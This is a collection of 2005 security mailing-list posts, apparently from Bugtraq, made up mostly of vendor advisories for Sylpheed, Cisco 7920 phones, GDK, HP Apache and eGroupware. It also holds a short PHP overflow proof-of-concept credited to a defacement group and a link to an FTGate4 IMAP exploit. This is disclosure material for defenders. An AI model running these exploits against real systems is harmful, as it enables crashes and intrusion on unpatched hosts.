RE: List of Security-oriented Fairs/Events/Conferences?
Help Net Security's Upcoming Conferences list at http://www.net-security.org/conferences.php has a good coverage for year 2005 too and is worth of checking too. Regards, Juha-Matti
[ GLSA 200511-13 ] Sylpheed, Sylpheed-Claws: Buffer overflow in LDIF importer
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Sylpheed, Sylpheed-Claws: Buffer overflow in LDIF importer Date: November 15, 2005 Bugs: #111853 ID: 200511-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Sylpheed and Sylpheed-Claws contain a buffer overflow vulnerability which may lead to the execution of arbitrary code. Background == Sylpheed is a lightweight email client and newsreader. Sylpheed-Claws is a 'bleeding edge' version of Sylpheed. They both support the import of address books in LDIF (Lightweight Directory Interchange Format). Affected packages = --- Package / Vulnerable / Unaffected --- 1 mail-client/sylpheed 2.0.4 = 2.0.4 2 mail-client/sylpheed-claws 1.0.5-r1 = 1.0.5-r1 --- 2 affected packages on all of their supported architectures. --- Description === Colin Leroy reported buffer overflow vulnerabilities in Sylpheed and Sylpheed-Claws. The LDIF importer uses a fixed length buffer to store data of variable length. Two similar problems exist also in the Mutt and Pine addressbook importers of Sylpheed-Claws. Impact == By convincing a user to import a specially-crafted LDIF file into the address book, a remote attacker could cause the program to crash, potentially allowing the execution of arbitrary code with the privileges of the user running the software. Workaround == There is no known workaround at this time. Resolution == All Sylpheed users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =mail-client/sylpheed-2.0.4 All Sylpheed-Claws users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =mail-client/sylpheed-claws-1.0.5-r1 References == [ 1 ] CVE-2005-3354 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3354 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature
Buffer Overrun in FTGate4 Groupware Mail server
/** Package: FTGate4 Groupware Mail server Auth: http://www.floosietek.com/ Version(s): 4.1 / previous versions may also be vulnerable Vulnerability Type: Remote Code Execution */ Disclaimer: - The information is provided as is without warranty of any kind. The author of this issue shall not be held liable for any downtime, lost profits, or damages due to the informations contained in this advisory. What?s FTGate4: -- [description taken from from the author's site] FTGate4 is a powerful Windows(TM) communication suite that combines exceptional mail handling facilities with comprehensive Groupware functionality. Its security and collaboration features were developed in conjunction with leading ISP's and define a new era in mail server performance. Synopsis: FTGate4 is vulnerable to a buffer overrun which could potentially lead to execution of arbitrary code. Description: --- FTGate4 contains a security flaw in the IMAP server caused due to boundary errors in the handling of various commands (like EXAMINE). Impact: -- An attacker could exploit the vulnerability by sending a malformed request to the IMAP server running on port 143, resulting in a Denial of Service condition and potentially arbitrary code execution with the privileges of the SYSTEM user. Workaround: -- There is no known workaround at this time. PoC: --- www.lucaercoli.it/exploits/FTGate-expl.pl Credits: -- Luca Ercoli io [at] lucaercoli.it http://www.lucaercoli.it
Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone Document ID: 68179 Advisory ID: cisco-sa-20051116-7920 http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml Revision 1.0 For Public Release 2005 November 16 1600 UTC (GMT) - --- Contents Summary Affected Products Details Impact Software Versions and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of This Notice: FINAL Distribution Revision History Cisco Security Procedures - --- Summary === The Cisco 7920 Wireless IP Phone provides Voice Over IP service via IEEE 802.11b Wi-Fi networks and has a form-factor similar to a cordless phone. This product contains two vulnerabilities: The first vulnerability is an SNMP service with fixed community strings that allow remote users to read, write, and erase the configuration of an affected device. The second vulnerability is an open VxWorks Remote Debugger on UDP port 17185 that may allow an unauthenticated remote user to access debugging information or cause a denial of service. Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of the vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml. Affected Products = Vulnerable Products +-- * Cisco 7920 Wireless IP Phone, firmware version 2.0 and earlier Products Confirmed Not Vulnerable + * Cisco 7920 Wireless IP Phone, firmware version 2.01 No other Cisco products are currently known to be affected by these vulnerabilities, including other IP telephony products. Details === Fixed SNMP Community Strings +--- The Cisco 7920 Wireless IP Phone provides an SNMP service with fixed read-only and read-write community strings of public and private, respectively. These strings cannot be changed by the user and will allow remote users to issue an SNMP GetRequest or SetRequest to the phone. SNMP can be used to retrieve and modify the device configuration, including stored user data such as phone book entries. To address this vulnerability, Cisco has provided updated software that removes the SNMP functionality from this product. This issue is documented in Cisco bug ID CSCsb75186 ( registered customers only) . VxWorks Debugger Port (wdbrpc, 17185/udp) + The Cisco 7920 Wireless IP Phone listens on UDP port 17185 to allow connections from a VxWorks debugger. This port may allow remote users to collect debugging information or conduct a denial of service attack against an affected device. To address this vulnerability, Cisco has provided updated software that closes UDP port 17185. This issue is documented in Cisco bug ID CSCsb38210 ( registered customers only) . Impact == Successful exploitation of these vulnerabilities may result in information leakage or denial of service attacks against an affected device. In the case of the Fixed SNMP Community Strings vulnerability, an attack may take the form of erasure or modification of the device configuration and personal user data. Software Versions and Fixes === Cisco has provided free software to address these vulnerabilities; please consult the chart below for details. When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. +-+ || Affected | First| |Cisco Bug ID| Firmware | Fixed| || Releases | Firmware | || | Release | |+---+| | CSCsb75186 ( | Release || | registered | 1.0(8)| Release| | customers only)| and | 1.0(9) | | (SNMP) | earlier || |+---+| | CSCsb38210 ( | Release || | registered | 2.0 and | Release| | customers only)| earlier | 2.01 | | (VxWorks
Buffer OverFlow For Php 4.3.10 and other ?? Local
?php /* Buffer OverFlow For Php 4.3.10 and other ?? Local Tested on: Apache 1.3.33/PHP 4.3.10 with easyphp 1.8 Credited: papipsycho write code: papipsycho for: G0t R00t ? AND [W]orld [D]efacers Website: [url=http://www.worlddefacers.net]http://www.worlddefacers.net[/url] Date: 13/11/2005 */ $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } $shm_id = shmop_open(0x00, c, 0644, 998); if(!$shm_id) { echo Impossible de créer la mémoire partagée\n; } ?
[USN-216-1] GDK vulnerabilities
=== Ubuntu Security Notice USN-216-1 November 16, 2005 gtk+2.0, gdk-pixbuf vulnerabilities CVE-2005-2975, CVE-2005-2976, CVE-2005-3186 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: gtk2-engines-pixbuf libgdk-pixbuf2 The problem can be corrected by upgrading the affected package to the following versions: Ubuntu 4.10: libgdk-pixbuf2: 0.22.0-7ubuntu1.2 gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1 Ubuntu 5.04: libgdk-pixbuf2: 0.22.0-7ubuntu2.1 gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1 Ubuntu 5.10: libgdk-pixbuf2: 0.22.0-8ubuntu0.1 gtk2-engines-pixbuf: 2.8.6-0ubuntu2.1 After a standard system upgrade you should restart your session to effect the necessary changes. Details follow: Two integer overflows have been discovered in the XPM image loader of the GDK pixbuf library. By tricking an user into opening a specially crafted XPM image with any Gnome desktop application that uses this library, this could be exploited to execute arbitrary code with the privileges of the user running the application. (CVE-2005-2976, CVE-2005-3186) Additionally, specially crafted XPM images could cause an endless loop in the image loader, which could be exploited to cause applications trying to open that image to hang. (CVE-2005-2975) Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.diff.gz Size/MD5: 375968 809e328e7978a1a05c363744b669a40e http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.dsc Size/MD5: 723 6c4495f57699b76148a0602927545e20 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0.orig.tar.gz Size/MD5: 519266 4db0503b5a62533db68b03908b981751 http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.diff.gz Size/MD5:49509 0ce4ae3ba4a43acaec0e267593c56400 http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.dsc Size/MD5: 1936 dde6d8e7ba7c47e843a5dc8c2b680499 http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10.orig.tar.gz Size/MD5: 14140860 b1876ebde3b85bceb576ee5e2ecfd60b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-common_2.4.10-1ubuntu1.2_all.deb Size/MD5: 2778618 00f15aa5dba52503adaf47cede461b2c http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-doc_2.4.10-1ubuntu1.2_all.deb Size/MD5: 1877958 bd501df1b60309f472ad33ee74200584 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_amd64.deb Size/MD5: 262178 27831fe024d2d09ac5f3c9c457ae0032 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_amd64.deb Size/MD5: 155374 c617a31cf7408ff7ccc6dcf544e766a1 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_amd64.deb Size/MD5: 8520 09e152c4a295c6b3b6e52375e0355e43 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_amd64.deb Size/MD5: 7936 baecd3a2aca1cb678e652782da890483 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf2_0.22.0-7ubuntu1.2_amd64.deb Size/MD5: 183498 080cdd7e1cb08979fc0140a191baf418 http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-0_2.4.10-1ubuntu1.2_amd64.deb Size/MD5: 2184102 04a8f1b3e01bf5618f5d8b70645be6bb http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-bin_2.4.10-1ubuntu1.2_amd64.deb Size/MD5:13932 9ed21c2bb288a11e4ca2436f4757abda http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dbg_2.4.10-1ubuntu1.2_amd64.deb Size/MD5: 10299800 a385ad242f16a96a1ba27b8945255856 http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dev_2.4.10-1ubuntu1.2_amd64.deb Size/MD5: 2841762 39311a1c6efc513741b6d38cd1b38f68 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_i386.deb Size/MD5: 258802 74c64c0bc8320c3452d63f9c4dfe4579 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_i386.deb Size/MD5: 147244 70d3c463e5158902c8218806cf9bea26 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_i386.deb Size/MD5: 7646 46d4bf959232f67c91d79fbd65c8dcf6 http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_i386.deb
Re: Authentication vulnerability in Belkin wireless devices
This is very odd, as we've reproduced this vulnerability on about 5 different F5D7230-4 with firmware 4.05.3 and 4.03.3, as well as on a few of the F5D7232-4 routers with the same firmware. This can't be a network specific setup issue, as we've tested this on several unrelated networks from Linux and Windows operating systems using Firefox and MS IE browsers. Kind Regards, On Wed, 2005-11-16 at 07:56 -0500, S.A.B.R.O. Net Security wrote: Hmmm... we were unable able to reproduce this vulnerability with one of our Belkin Wifi F5D7230-4 with firmware version 4.05.03 Once the admin has authenticated any other attempts to access the device from any source (hardwire lan, wifi, remote) displays the following result : Duplicate Administrator This device is managed by xxx.xxx.x.x currently!! -- Andrei Mikhailovsky Arhont Ltd - Information Security Web: http://www.arhont.com http://www.wi-foo.com Tel: +44 (0)870 4431337 Fax: +44 (0)117 9690141 PGP: Key ID - 0x2B3438DE PGP: Server - keyserver.pgp.com signature.asc Description: This is a digitally signed message part
[security bulletin] SSRT051251 - Apache-based Web Server on HP-UX mod_ssl, proxy_http, Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00555254 Version: 1 HPSBUX02074 SSRT051251 - Apache-based Web Server on HP-UX mod_ssl, proxy_http, Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2005-11-10 Last Updated: 2005-11-15 Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerability could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access. References: CVE-2005-2491, CVE-2005-1268, CVE-2005-2728, CVE-2005-2088. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.11, B.11.23 running Apache-based Web Server prior to v.2.0.55. BACKGROUND The following potential security vulnerabilities are resolved in the software updates listed below: CVE-2005-2088 (cve.mitre.org): HTTP Request Smuggling. CVE-2005-2491 (cve.mitre.org): Integer overflow in pcre_compile.c. CVE-2005-2728 (cve.mitre.org): Remote denial of service. CVE-2005-1268 (cve.mitre.org): Remote denial of service. AFFECTED VERSIONS For IPv4: HP-UX B.11.00 HP-UX B.11.11 = hpuxwsAPACHE action: install revision A.2.0.55.00 or subsequent For IPv6: HP-UX B.11.11 = hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 action: install revision B.2.0.55.00 or subsequent HP-UX B.11.23 = hpuxwsAPACHE action: install revision B.2.0.55.00 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=HPUXWSSUITE HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.55.00 or subsequent. Apache Update Procedure Check for Apache Installation To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -i apache hpuxwsAPACHE B.2.0.54.00 HP-UX Apache-based Web Server Stop Apache - Before updating, make sure to stop any previous Apache binary. Otherwise, the previous binary will continue running, preventing the new one from starting, although the installation would be successful. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop Download and Install Apache - Download Apache from Software Depot: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/ displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. Removing Apache Installation If you prefer to remove Apache from your system instead of installing a newer revision to resolve the security problem, use both Software Distributor's swremove command and also rm -rf the home location as specified in the rc.config.d file HOME variables. %ls /etc/rc.config.d | grep apache hpapache2conf hpws_apache[32]conf MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product. PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi displayProductInfo.pl?productnumber=B6834AAtN UPDATE HISTORY Initial release: 15 November 2005 Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related
Re: List of Security-oriented Fairs/Events/Conferences?
Rainer, I keep my list here: http://www.sicurezzainformatica.it/eventi.html FYI, the main site is here: http://www.sicurezzainformatica.it ciao, Luca -Original Message- From: Rainer Duffner [mailto:[EMAIL PROTECTED] Sent: Monday, November 14, 2005 06:39 To: bugtraq@securityfocus.com Subject: List of Security-oriented Fairs/Events/Conferences? Hi, some time ago, Securityfocus had a list of upcoming security-conferences - this seems to have disappeared. Does anyone have another link to a site that provides those? -- ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ www.sicurezzainformatica.it PGP key fingerprint: 0249 6760 9D67 BC72 5118 CBD8 4C19 EA57 7963 DBDC ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
[security bulletin] SSRT5979 - HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00557788 Version: 1 HPSBPI02078 SSRT5979 - HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2005-11-15 Last Updated: 2005-11-15 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with the HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) . These vulnerabilities may be exploited remotely by an unauthorized user to create a Denial of Service (DoS). References: NISCC Vulnerability Advisory 273756 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Jetdirect 635n IPv6/IPsec Print Server (J7961A) running firmware versions prior to J7961A V.31.08 BACKGROUND RESOLUTION HP is providing a firmware update, J7961A V.31.08, to resolve this issue. The firmware can be updated using the HP Download Manager application. The HP Download Manager application can be downloaded from http://www.hp.com/go/dlm_sw. UPDATE HISTORY Initial release: 15 November 2005 Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement. (c)Copyright 2005 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN
MDKSA-2005:212 - Updated egroupware packages to address phpldapadmin, phpsysinfo vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:212 http://www.mandriva.com/security/ ___ Package : egroupware Date: November 16, 2005 Affected: Corporate 3.0 ___ Problem Description: Egroupware contains embedded copies of several php based projects, including phpldapadmin and phpsysinfo. Phpldapadmin before 0.9.6c allows remote attackers to gain anonymous access to the LDAP server, even when disable_anon_bind is set, via an HTTP request to login.php with the anonymous_bind parameter set. (CAN-2005-2654) Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the custom_welcome_page parameter. (CAN-2005-2792) PHP remote code injection vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code via the custom_welcome_page parameter. (CAN-2005-2793) Maksymilian Arciemowicz discovered several cross site scripting issues in phpsysinfo, a PHP based host information application. (CAN-2005-0869, 0870) Christopher Kunz discovered that local variables in phpsysinfo get overwritten unconditionally and are trusted later, which could lead to the inclusion of arbitrary files. (CAN-2005-3347) Christopher Kunz discovered that user-supplied input in phpsysinfo is used unsanitised, causing a HTTP Response splitting problem. (CAN-2005-3348) The updated packages have new versions of these subsystems to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2654 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2792 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0869 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0870 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3347 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3348 ___ Updated Packages: Corporate 3.0: ede368f20b1e00144278800d3b6bf468 corporate/3.0/RPMS/egroupware-1.0-0.RC3.1.1.C30mdk.noarch.rpm 8260713a9c28f6f7c7b08630af98b80c corporate/3.0/RPMS/egroupware-addressbook-1.0-0.RC3.1.1.C30mdk.noarch.rpm 053e62d63d08566a51f5a4caed575920 corporate/3.0/RPMS/egroupware-backup-1.0-0.RC3.1.1.C30mdk.noarch.rpm 9d2a654955fd2dc83f965366a2af77a0 corporate/3.0/RPMS/egroupware-bookmarks-1.0-0.RC3.1.1.C30mdk.noarch.rpm ee1d890db9e37afaa9ddd5caeab02223 corporate/3.0/RPMS/egroupware-calendar-1.0-0.RC3.1.1.C30mdk.noarch.rpm 26ecafedde93c891562ed679f833f1f0 corporate/3.0/RPMS/egroupware-comic-1.0-0.RC3.1.1.C30mdk.noarch.rpm eecee2ff5e2c5beb36c4592235227d9d corporate/3.0/RPMS/egroupware-developer_tools-1.0-0.RC3.1.1.C30mdk.noarch.rpm 153f3f86f72b627c3f12eb44715a01fd corporate/3.0/RPMS/egroupware-email-1.0-0.RC3.1.1.C30mdk.noarch.rpm 3863031cfccf6ba411ae8965b4e13af0 corporate/3.0/RPMS/egroupware-emailadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm 260713edaf667a6c0af01afe5cf1276f corporate/3.0/RPMS/egroupware-etemplate-1.0-0.RC3.1.1.C30mdk.noarch.rpm a3ae6cc74fb5191f41a7e602741a corporate/3.0/RPMS/egroupware-felamimail-1.0-0.RC3.1.1.C30mdk.noarch.rpm a95d31bb108a6126d3187af8c77c2164 corporate/3.0/RPMS/egroupware-filemanager-1.0-0.RC3.1.1.C30mdk.noarch.rpm 772a8690091f509727ef70f6b363d6bf corporate/3.0/RPMS/egroupware-forum-1.0-0.RC3.1.1.C30mdk.noarch.rpm e97692f7a5c888e4ea1a86236c9bd124 corporate/3.0/RPMS/egroupware-ftp-1.0-0.RC3.1.1.C30mdk.noarch.rpm c9a5f4a17bf1697e7eb5e1e6421a6ff3 corporate/3.0/RPMS/egroupware-fudforum-1.0-0.RC3.1.1.C30mdk.noarch.rpm d8a9513798c91e6cbd39667fa04784ff corporate/3.0/RPMS/egroupware-headlines-1.0-0.RC3.1.1.C30mdk.noarch.rpm 87f25244c8af456bf43c66650dbc05e6 corporate/3.0/RPMS/egroupware-infolog-1.0-0.RC3.1.1.C30mdk.noarch.rpm 67fc3ed193d9e5a5b5e3d0ab4b3b21af corporate/3.0/RPMS/egroupware-jinn-1.0-0.RC3.1.1.C30mdk.noarch.rpm 0c4a7125fa56f7e2c62b37c0e9657fda corporate/3.0/RPMS/egroupware-messenger-1.0-0.RC3.1.1.C30mdk.noarch.rpm 7c59389b480bab742b74a7fa3c304e08 corporate/3.0/RPMS/egroupware-news_admin-1.0-0.RC3.1.1.C30mdk.noarch.rpm ccc1a38a19f371b24014c078fd270640 corporate/3.0/RPMS/egroupware-phpbrain-1.0-0.RC3.1.1.C30mdk.noarch.rpm 4d08c9988a1a8b371dbb8e775f10ead5 corporate/3.0/RPMS/egroupware-phpldapadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm 49e15a21e9649192aec8a094fbd6ba23 corporate/3.0/RPMS/egroupware-phpsysinfo-1.0-0.RC3.1.1.C30mdk.noarch.rpm 449fc4f64a2684e801026551d10775a6
[ GLSA 200511-14 ] GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities
